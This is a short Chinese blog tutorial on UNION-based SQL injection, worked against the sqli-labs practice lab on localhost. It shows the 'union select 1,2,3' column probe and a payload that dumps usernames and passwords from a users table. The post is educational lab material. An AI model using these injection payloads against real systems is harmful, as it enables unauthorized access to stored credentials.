union注入之select

时间：2021-06-02 11:12:14 阅读：0 评论：0 收藏：0 [点我收藏+]

标签：master inf 失效 info alt 使用 mic margin 输入

　　在sql注入中我们通常会使用这样一条语句来爆破字段:

id=-1 union select 1,2,3 --+    源代码： SELECT * FROM users WHERE id=-1 union select 1,2,3

　　假如表的字段是三个，他会根据程序的设定来输出哪个字段。如果这时使用键值对来查询，而不是数组标号，就会提出一个问题：根据键值对查询出的结果还会是后面的那个表的结果吗，结果当然是肯定的。

当前面的id=-1 ，即前一个select失效后，查询的键值对会依次输入后面查询的值

echo ‘Your Login name:‘. $row[‘username‘];
echo ‘Your Password:‘ .$row[‘password‘];
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1‘union select 1, password,username from users where id =2--+

　　技术图片

union注入之select

标签：master inf 失效 info alt 使用 mic margin 输入

原文地址：https://www.cnblogs.com/jokdh/p/14812935.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行